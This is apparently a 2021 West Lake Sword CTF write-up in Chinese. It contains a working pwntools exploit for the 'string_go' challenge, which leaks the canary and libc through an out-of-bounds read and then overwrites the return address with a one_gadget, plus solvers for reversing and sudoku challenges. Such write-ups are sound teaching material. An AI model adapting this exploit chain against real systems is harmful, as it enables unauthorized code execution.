2021 西湖论剑部分题目 Writeup
xp0int Posted on Nov 23 2021

西湖论剑 2021 Writeup By Xp0int

## 1. Pwn

### 1.1 string_go

`Author: c1ark`

实现了一个简单的计算器,输入计算表达式得到的结果为3就可以进入存在栈溢出漏洞的函数,然后利用数组越界泄露libc和canary,劫持返回地址为onegadget。

```
# Exploit used against the event's challenge instance. The host/port, the libc
# delta (0x730157) and the one_gadget offset (0x4f3d5) are all tied to that
# instance's libc build and do not transfer to any other target.
# Payloads are str rather than bytes, which reads as Python 2-era pwntools;
# NOTE(review): confirm before running under Python 3 (ljust with a str
# fill on bytes would raise TypeError).
from pwn import *
context(os='linux', arch='amd64',log_level='debug')
context.terminal =['tmux', 'splitw', '-h']
p=remote("82.157.20.104",56700)
#p = gdb.debug("./string_go")
#p=process("./string_go")
# Short aliases around the pwntools tube API.
se = lambda data :p.send(data)
sa = lambda delim,data :p.sendafter(delim, data)
sl = lambda data :p.sendline(data)
sla = lambda delim,data :p.sendlineafter(delim, data)
rc = lambda numb=4096 :p.recv(numb)
ru = lambda delims :p.recvuntil(delims)
uu32 = lambda data :u32(data.ljust(4, '\x00'))
uu64 = lambda data :u64(data.ljust(8, '\x00'))
info_addr = lambda tag, addr :p.success(tag + ': {:#x}'.format(addr))
def debug():
    # Attach gdb to the live tube and drop into interactive mode.
    gdb.attach(p)
    p.interactive()
def debug_pause():
    # Attach gdb and block until the operator continues.
    gdb.attach(p)
    pause()
# Expression evaluating to 3 reaches the vulnerable function (see the
# description above); the next inputs are the indices used for the leak.
sla(">>> ","1+2")
sla(">>> ","-8")
sla(">>> ","a"*0x8)
sla(">>> ","\x40")
# Each leaked pointer is read up to its 0x7f high byte; the last 6 bytes are
# the pointer, zero-extended to 8 bytes.
stack_addr = u64(ru("\x7f")[-6:].ljust(8,"\x00"))
info_addr("stack_addr",stack_addr)
libc_addr = u64(ru("\x7f")[-6:].ljust(8,"\x00"))
libc_base = libc_addr - 0x730157   # build-specific offset of the leaked libc pointer
info_addr("libc_base",libc_base)
rc(10)                 # skip 10 bytes, then the 8-byte canary follows
canary = u64(rc(8))
info_addr("canary",canary)
# onegadget p64(libc_base+0x4f3d5)
# 3 qwords of padding, the canary kept intact, 3 more qwords, then the return
# address overwritten with the one_gadget.
payload = p64(0)*3+p64(canary)+p64(0)*3 + p64(libc_base+0x4f3d5)
sla(">>> ",payload)
p.interactive()
```

flag值: DASCTF{25961f8592eb28365aeafa836225285b}

## 2. 
Reverse

### 2.1 Tactical Armed

`Author: cew`

魔改tea,sum是累积的,delta也改过

```
/*
 * Decrypt one 64-bit block of the challenge's modified TEA.
 * Deviations from reference TEA that this routine encodes:
 *   - the round sum is not rebuilt per call: it starts from *ddd (whatever
 *     the previous call left there) and round*delta is added on top, so the
 *     sum accumulates from block to block;
 *   - delta is 0x81a5692e rather than the usual 0x9e3779b9.
 * v     : ciphertext block (2 words), read only
 * k     : 128-bit key (4 words)
 * out   : receives the 2 plaintext words
 * round : number of rounds (33 in main)
 * ddd   : in/out accumulated sum carried between calls
 * Needs <stdint.h> and <stdio.h>, which the listing omits.
 */
void decrypt(uint32_t v[2], const uint32_t k[4], uint32_t* out, uint32_t round, uint32_t *ddd) {
    uint32_t v0 = v[0], v1 = v[1], sum = *ddd, i; /* sum starts where the previous block left it */
    uint32_t delta = 0x81a5692e; /* modified key-schedule constant */
    /* Advance the sum by round*delta (mod 2^32). This `int i` shadows the
     * uint32_t `i` above; the comparison is signed/unsigned but fine here. */
    for (int i = 0; i < round; i++) { sum += delta; }
    *ddd = sum; /* the advanced sum is what the next call starts from */
    uint32_t k0 = k[0], k1 = k[1], k2 = k[2], k3 = k[3]; /* cache key */
    for (i = 0; i < round; i++) { /* basic cycle start */
        v1 -= ((v0 << 4) + k2) ^ (v0 + sum) ^ ((v0 >> 5) + k3);
        v0 -= ((v1 << 4) + k0) ^ (v1 + sum) ^ ((v1 >> 5) + k1);
        sum -= delta;
    } /* end cycle */
    out[0] = v0; out[1] = v1;
}
int main(){
    uint32_t key[4] = { 0x7CE45630, 0x58334908, 0x66398867, 0x0C35195B1 };
    /* 10 ciphertext words; the extra 0 keeps enc the same size as out. */
    uint32_t enc[11] = { 1110384109, 344319090, 55933141, 3211493538, 2547479109, 766408145, 1717545315, 690908532, 2543189185, 196462825, 0 };
    /* out[10] is never written, so it stays 0 and terminates the printed string. */
    uint32_t out[11] = { 0 };
    /* Round-count search used while reversing, kept for reference:
    for (int round = 0; round < 128; round++) { for (int i = 0; i < 10; i += 2) { decrypt(enc + i, key, out + i, round); } printf("%d -> 0x%08x\n", round, out[0]); }*/
    /* With ddd = 0 the first block runs with sum = 33*delta; later blocks
     * continue from the accumulated value. */
    uint32_t ddd = 0;
    for (int i = 0; i < 10; i += 2) { decrypt(enc + i, key, out + i, 33, &ddd); }
    printf("%s", (char*)out);
}
```

### 2.2 gghdl

`Author: cew`

c调用vhdl,怎么操作的着实看不懂,但是动调可以发现就是把输入一一置换然后与常值比较

```
0x810e5e8: 0x0202030302030203 0x810fec8: 0x0202020303020303 0x810e5e8: 0x0302030302030203 0x810fec8: 0x0302030303020303 0x810e5e8: 0x0203030302030203 0x810fec8: 0x0303030302020303 0x810e5e8: 0x0303030302030203 0x810fec8: 0x0303030303020303 0x810e5e8: 0x0202020302030203 0x810fec8: 0x0202020302020303 0x810e5e8: 0x0302020302030203 0x810fec8: 0x0203020303020303 0x810e5e8: 0x0203020302030203 0x810fec8: 0x0303030202030303 0x810e5e8: 0x0303020302030203 0x810fec8: 0x0202030302030203 0x810e5e8: 0x0202030202030203 0x810fec8: 0x0203020302030203 0x810e5e8: 0x0302030202030203 0x810fec8: 0x0203030302030203 0x810e5e8: 0x0302030303030303 0x810fec8: 0x0302030202030203 0x810e5e8: 0x0203030303030303 0x810fec8: 
0x0302030302030203 0x810e5e8: 0x0303030303030303 0x810fec8: 0x0302030202030203 0x810e5e8: 0x0202020303030303 0x810fec8: 0x0203020302030203 0x810e5e8: 0x0302020303030303 0x810fec8: 0x0203030302030203 0x810e5e8: 0x0203020303030303 0x810fec8: 0x0302020203030203 0x810e5e8: 0x0303020303030303 0x810fec8: 0x0302030303030303 0x810e5e8: 0x0202030203030303 0x810fec8: 0x0203030303030303 0x810e5e8: 0x0302030203030303 0x810fec8: 0x0302030303030303 0x810e5e8: 0x0203030203030303 0x810fec8: 0x0202020303030303 0x810e5e8: 0x0303030203030303 0x810fec8: 0x0302020203030203 0x810e5e8: 0x0202020203030303 0x810fec8: 0x0202020302030203 0x810e5e8: 0x0302020203030303 0x810fec8: 0x0202030302030203 0x810e5e8: 0x0203020203030303 0x810fec8: 0x0303030303030303 0x810e5e8: 0x0303020203030303 0x810fec8: 0x0202030202030203 0x810e5e8: 0x0202030302030303 0x810fec8: 0x0302020203030203 0x810e5e8: 0x0302030302030303 0x810fec8: 0x0202030202030203 0x810e5e8: 0x0203030302030303 0x810fec8: 0x0303030302030203 0x810e5e8: 0x0303030302030303 0x810fec8: 0x0302030302030203 0x810e5e8: 0x0202020302030303 0x810fec8: 0x0202030202030203 0x810e5e8: 0x0302020302030303 0x810fec8: 0x0302020203030203 0x810e5e8: 0x0203020302030303 0x810fec8: 0x0203020303030303 0x810e5e8: 0x0303020302030303 0x810fec8: 0x0202030302030203 0x810e5e8: 0x0202030202030303 0x810fec8: 0x0302030303030303 0x810e5e8: 0x0302030202030303 0x810fec8: 0x0203020302030203 0x810e5e8: 0x0203030202030303 0x810fec8: 0x0203030303030303 0x810e5e8: 0x0302030303020303 0x810fec8: 0x0302030302030203 0x810e5e8: 0x0203030303020303 0x810fec8: 0x0202030202030203 0x810e5e8: 0x0303030303020303 0x810fec8: 0x0203020302030203 0x810e5e8: 0x0202020303020303 0x810fec8: 0x0202020302030203 0x810e5e8: 0x0302020303020303 0x810fec8: 0x0202030202030203 0x810e5e8: 0x0203020303020303 0x810fec8: 0x0203030302030203 0x810e5e8: 0x0303020303020303 0x810fec8: 0x0303030303030303 0x810e5e8: 0x0202030203020303 0x810fec8: 0x0302020202030303 0x810e5e8: 0x0302030203020303 0x810fec8: 0x0202020303020303 
0x810e5e8: 0x0203030203020303 0x810fec8: 0x0302030303020303 0x810e5e8: 0x0303030203020303 0x810fec8: 0x0303030302020303 0x810e5e8: 0x0202020203020303 0x810fec8: 0x0303030303020303 0x810e5e8: 0x0302020203020303 0x810fec8: 0x0202020302020303 0x810e5e8: 0x0203020203020303 0x810fec8: 0x0203020303020303 0x810e5e8: 0x0303020203020303 0x810fec8: 0x0303030202030303 0x810e5e8: 0x0202030302020303 0x810fec8: 0x0202030302030203 0x810e5e8: 0x0302030302020303 0x810fec8: 0x0203020302030203 0x810e5e8: 0x0203030302020303 0x810fec8: 0x0203030302030203 0x810e5e8: 0x0303030302020303 0x810fec8: 0x0302030202030203 0x810e5e8: 0x0202020302020303 0x810fec8: 0x0302030302030203 0x810e5e8: 0x0302020302020303 0x810fec8: 0x0302030202030203 0x810e5e8: 0x0203020302020303 0x810fec8: 0x0203020302030203 0x810e5e8: 0x0303020302020303 0x810fec8: 0x0203030302030203 0x810e5e8: 0x0202030202020303 0x810fec8: 0x0302020203030203 0x810e5e8: 0x0302030202020303 0x810fec8: 0x0302030303030303 0x810e5e8: 0x0203030202020303 0x810fec8: 0x0203030303030303 0x810e5e8: 0x0302030303030203 0x810fec8: 0x0302030303030303 0x810e5e8: 0x0203030303030203 0x810fec8: 0x0202020303030303 0x810e5e8: 0x0303030303030203 0x810fec8: 0x0302020203030203 0x810e5e8: 0x0202020303030203 0x810fec8: 0x0202020302030203 0x810e5e8: 0x0202030303030203 0x810fec8: 0x0202030302030203 0x810e5e8: 0x0302020303030203 0x810fec8: 0x0303030303030303 0x810e5e8: 0x0203020303030203 0x810fec8: 0x0202030202030203 0x810e5e8: 0x0303020303030203 0x810fec8: 0x0302020203030203 0x810e5e8: 0x0202030203030203 0x810fec8: 0x0202030202030203 0x810e5e8: 0x0302030203030203 0x810fec8: 0x0303030302030203 0x810e5e8: 0x0203030203030203 0x810fec8: 0x0302030302030203 0x810e5e8: 0x0303030203030203 0x810fec8: 0x0202030202030203 0x810e5e8: 0x0202020203030203 0x810fec8: 0x0302020203030203 0x810e5e8: 0x0302020203030203 0x810fec8: 0x0203020303030303 0x810e5e8: 0x0203020203030203 0x810fec8: 0x0202030302030203 0x810e5e8: 0x0303020203030203 0x810fec8: 0x0302030303030303 0x810e5e8: 
0x0203030202030203 0x810fec8: 0x0203020302030203 0x810e5e8: 0x0303030202030203 0x810fec8: 0x0203030303030303 0x810e5e8: 0x0202020202030203 0x810fec8: 0x0302030302030203 0x810e5e8: 0x0302020202030203 0x810fec8: 0x0202030202030203 0x810e5e8: 0x0203020202030203 0x810fec8: 0x0203020302030203 0x810e5e8: 0x0303020202030203 0x810fec8: 0x0202020302030203 0x810e5e8: 0x0202030303020303 0x810fec8: 0x0202030202030203 0x810e5e8: 0x0303030202020303 0x810fec8: 0x0203030302030203 0x810e5e8: 0x0202020202020303 0x810fec8: 0x0303030303030303 0x810e5e8: 0x0302020202020303 0x810fec8: 0x0302020202030303 0x810e5e8: 0x0203020202020303 0x810fec8: 0x0202020303020303 0x810e5e8: 0x0303020202020303 0x810fec8: 0x0302030303020303 0x810e5e8: 0x0202030303030303 0x810fec8: 0x0303030302020303 0x810e5e8: 0x0303030202030303 0x810fec8: 0x0303030303020303 0x810e5e8: 0x0202020202030303 0x810fec8: 0x0202020302020303 0x810e5e8: 0x0302020202030303 0x810fec8: 0x0203020303020303 0x810e5e8: 0x0203020202030303 0x810fec8: 0x0303030202030303 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0202030302030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0203020302030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0203030302030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0302030202030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0302030302030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0302030202030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0203020302030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0203030302030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0302020203030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0302030303030303 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0203030303030303 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0302030303030303 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0202020303030303 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0302020203030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0202020302030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0202030302030203 0x810e5e8: 0x0202030302030203 
0x810fec8: 0x0303030303030303 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0202030202030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0302020203030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0202030202030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0303030302030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0302030302030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0202030202030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0302020203030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0203020303030303 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0202030302030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0302030303030303 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0203020302030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0203030303030303 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0302030302030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0202030202030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0203020302030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0202020302030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0202030202030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0203030302030203 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0303030303030303 0x810e5e8: 0x0202030302030203 0x810fec8: 0x0302020202030303
```

```
# ghdl.txt holds the data dumped above: pairs of lines, the first being the
# value the binary derived from the i-th input byte (the i-th character of
# `test`, read at 0x810e5e8), the second the constant that position is
# compared against (read at 0x810fec8).
f = open("ghdl.txt", "r").readlines()
cmp = []
# Probe characters in the order they were fed to the binary; the run of '0's
# pads the list to the number of dumped pairs (checked by the assert below).
test = list("0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$ %&'()*+,-./:;<=>?@[\\]^_`{|}~0000000000000000000000000000000000000")
dic = {}
for i in range(0, len(f), 2):
    # print(f[i], f[i+1])
    inin = f[i].strip().split(' ')[1]
    cmpcmp = f[i+1].strip().split(' ')[1]
    cmp.append(cmpcmp)
    dic[inin] = test[i // 2]   # derived value -> the character that produced it
assert len(cmp) == len(test)
print(dic)
# Map each expected constant back to the character that produces it; a
# constant never observed during probing prints as '?'.
for i in range(len(cmp)):
    val = cmp[i]
    try:
        print(dic[val], end='')
    except:  # NOTE(review): bare except; KeyError is the only case meant here
        print('?',end='')
```

### 2.3 ROR

`Author: cew`

每8字节一组,取每字节的1个比特位组成1字节,每8字节就生成了8字节的数据,反着推就行

```
# Expected output bytes taken from the binary (continued on the next line).
cmp = [101, 85, 36, 54, 157, 113, 184, 200, 101, 251, 135, 127, 154, 156, 177, 223, 101, 143, 157, 57, 143, 17, 246, 142, 101, 66, 218, 180, 140, 57, 251,
153, 101, 72, 106, 202, 99, 231, 164, 121]
# Lookup table recovered from the binary; each expected byte is found in it
# by position, which undoes the substitution.
mmm = [101, 8, 247, 18, 188, 195, 207, 184, 131, 123, 2, 213, 52, 189, 159, 51, 119, 118, 212, 215, 235, 144, 137, 94, 84, 1, 125, 244, 17, 255, 153, 73, 173, 87, 70, 103, 42, 157, 127, 210, 225, 33, 139, 29, 90, 145, 56, 148, 249, 12, 0, 202, 232, 203, 95, 25, 246, 240, 60, 222, 218, 234, 156, 20, 117, 164, 13, 37, 88, 252, 68, 134, 5, 107, 67, 154, 109, 209, 99, 152, 104, 45, 82, 61, 221, 136, 214, 208, 162, 237, 165, 59, 69, 62, 242, 34, 6, 243, 26, 168, 9, 220, 124, 75, 92, 30, 161, 176, 113, 4, 226, 155, 183, 16, 78, 22, 35, 130, 86, 216, 97, 180, 36, 126, 135, 248, 10, 19, 227, 228, 230, 28, 53, 44, 177, 236, 147, 102, 3, 169, 149, 187, 211, 81, 57, 231, 201, 206, 41, 114, 71, 108, 112, 21, 223, 217, 23, 116, 63, 98, 205, 65, 7, 115, 83, 133, 49, 138, 48, 170, 172, 46, 163, 80, 122, 181, 142, 105, 31, 106, 151, 85, 58, 178, 89, 171, 224, 40, 192, 179, 190, 204, 198, 43, 91, 146, 238, 96, 32, 132, 77, 15, 38, 74, 72, 11, 54, 128, 93, 111, 76, 185, 129, 150, 50, 253, 64, 141, 39, 193, 120, 79, 121, 200, 14, 140, 229, 158, 174, 191, 239, 66, 197, 175, 160, 194, 250, 199, 182, 219, 24, 196, 166, 254, 233, 245, 110, 100, 47, 241, 27, 251, 186, 167, 55, 143]
idx = []
for val in cmp:
    idx.append(mmm.index(val))
# Each group of 8 values is an 8x8 bit matrix: the binary built byte j from
# one bit of each input byte, so reading the matrix column-wise (a transpose)
# restores the original 8 input bytes.
for i in range(0, len(idx), 8):
    cur = idx[i:i+8]
    cur = [bin(_)[2:].rjust(8, '0') for _ in cur]   # 8-char bit strings
    for j in range(8):
        sss = ""
        for k in range(8):
            sss += cur[k][j]
        print(chr(int(sss, 2)), end='')
```

### 2.4 虚假的粉丝

`Author: cew`

300分的签到题。。。根据elf的限制条件找到ASCII-faded 4157.txt 1118 83,key1 = 4157, key2 = 1118,key3 = 83 然后base64解码UzNDcmU3X0szeSUyMCUzRCUyMEFsNE5fd0FsSzNS -> S3Cre7_K3y%20%3D%20Al4N_wAlK3R得到key:Al4N_wAlK3R,然后就让程序一直运行到结束得到flag

```
import os
# Scan every file under ./f/ for a 'U' that has an 'S' 39 bytes later, which
# matches the 40-character base64 string quoted above (starts with 'U', ends
# with 'S'); prints the file name and offset of each hit.
files = os.listdir("./f/")
for file in files:
    s = open("./f/" + file, "rb").read()   # NOTE(review): handle never closed; a with-block would be cleaner
    s = list(s)   # list of ints, so ord() is used for the comparisons below
    try:
        idx = s.index(ord('U'))
        while s[idx+39] != ord('S'):
            idx = s.index(ord('U'), idx+1)
        print(file, idx, s[idx+39])
    except:  # NOTE(review): bare except; relied on for ValueError (no further 'U') and IndexError (idx+39 past end of file)
        continue
```

![enter image description 
here](https://leanote.com/api/file/getImage?fileId=6198cbbbab644142c0f1bca8)

## 3. Crypto

### 3.1 密码人集合

`Author: cew`

网上解数独脚本改一改一把梭

```
from pwn import *
context.log_level = 'debug'

class solution(object):
    """Backtracking sudoku solver over a 9x9 list of lists; 0 marks a blank cell."""
    def __init__(self,board):
        self.b = board   # the board is solved in place
        self.t = 0       # number of candidate placements tried
    def check(self,x,y,value):  # True when value is absent from row x, column y and the 3x3 box
        for row_item in self.b[x]:
            if row_item == value:
                return False
        for row_all in self.b:
            if row_all[y] == value:
                return False
        row,col=x//3*3,y//3*3
        row3col3=self.b[row][col:col+3]+self.b[row+1][col:col+3]+self.b[row+2][col:col+3]
        for row3col3_item in row3col3:
            if row3col3_item == value:
                return False
        return True
    def get_next(self,x,y):  # next blank cell after (x, y) in row-major order; cells before it are not re-scanned
        for next_soulu in range(y+1,9):
            if self.b[x][next_soulu] == 0:
                return x,next_soulu
        for row_n in range(x+1,9):
            for col_n in range(0,9):
                if self.b[row_n][col_n] == 0:
                    return row_n,col_n
        return -1,-1  # no blank cell left
    def try_it(self,x,y):  # main recursion: returns True once the board is full, None on a dead end
        if self.b[x][y] == 0:
            for i in range(1,10):  # try candidates 1..9
                self.t+=1
                if self.check(x,y,i):  # candidate clashes with nothing in row, column or box
                    self.b[x][y]=i  # place it
                    next_x,next_y=self.get_next(x,y)  # locate the next blank
                    if next_x == -1:  # no blank left: solved
                        return True
                    else:  # recurse into the next blank until the board is filled
                        end=self.try_it(next_x,next_y)
                        if not end:  # the deeper call hit a dead end (returned None)
                            self.b[x][y] = 0  # undo and try the next candidate
                        else:
                            return True
    def start(self):
        # NOTE(review): datetime is not imported in this listing; unless the
        # pwntools star-import provides it, the two timing lines raise NameError.
        # begin/end are never used afterwards.
        begin = datetime.datetime.now()
        if self.b[0][0] == 0:
            self.try_it(0,0)
        else:
            x,y=self.get_next(0,0)
            self.try_it(x,y)
        for i in self.b:
            print(i)
        end = datetime.datetime.now()
        return self.b   # the board, filled in place if a solution was found

# The puzzle uses the nine characters of this slogan instead of digits;
# map them to 1..9 for the solver and back for the answer.
sss = "西湖论剑我要拿第一"
dic = {}
rev_dic = {}
for i in range(9):
    dic[sss[i]] = i+1
    rev_dic[i+1] = sss[i]
# print(dic)
# conn = remote("82.157.25.233", 30900)
# conn.recvuntil("------------------------------\n")
# Hard-coded puzzle ('*' marks a blank); presumably copied from the remote
# service whose read loop is commented out below.
line = '''* * * | * * 剑 | * * 要
* * * | * 拿 要 | * * 我
我 要 * | * * * | * * *
* * * | * 第 我 | * * *
* 拿 * | 要 * 湖 | * * *
* * * | 拿 * * | * * *
* * 论 | 湖 * * | 要 * *
拿 * * | * * * | * * *
西 * * | * 一 拿 | 湖 * *'''.split('\n')
# for i in range(3):
#     for i in range(3):
#         line.append(conn.recvuntil('\n').decode())
#     conn.recvuntil('\n')
mat = []
for i in range(9):
    line[i] = line[i].strip().replace('| ', '').split(' ')
    tmp = []
    for ch in line[i]:
        if ch != '':
            if ch == '*':
                tmp.append(0)
            else:
                tmp.append(dic[ch])
    mat.append(tmp)
print(mat)
s = solution(mat)
res = s.start()
sendddd = ""
for i in range(9):
    for j in range(9):
        sendddd += rev_dic[res[i][j]]
print(sendddd)
# conn.sendline(sendddd)
# conn.interactive()
```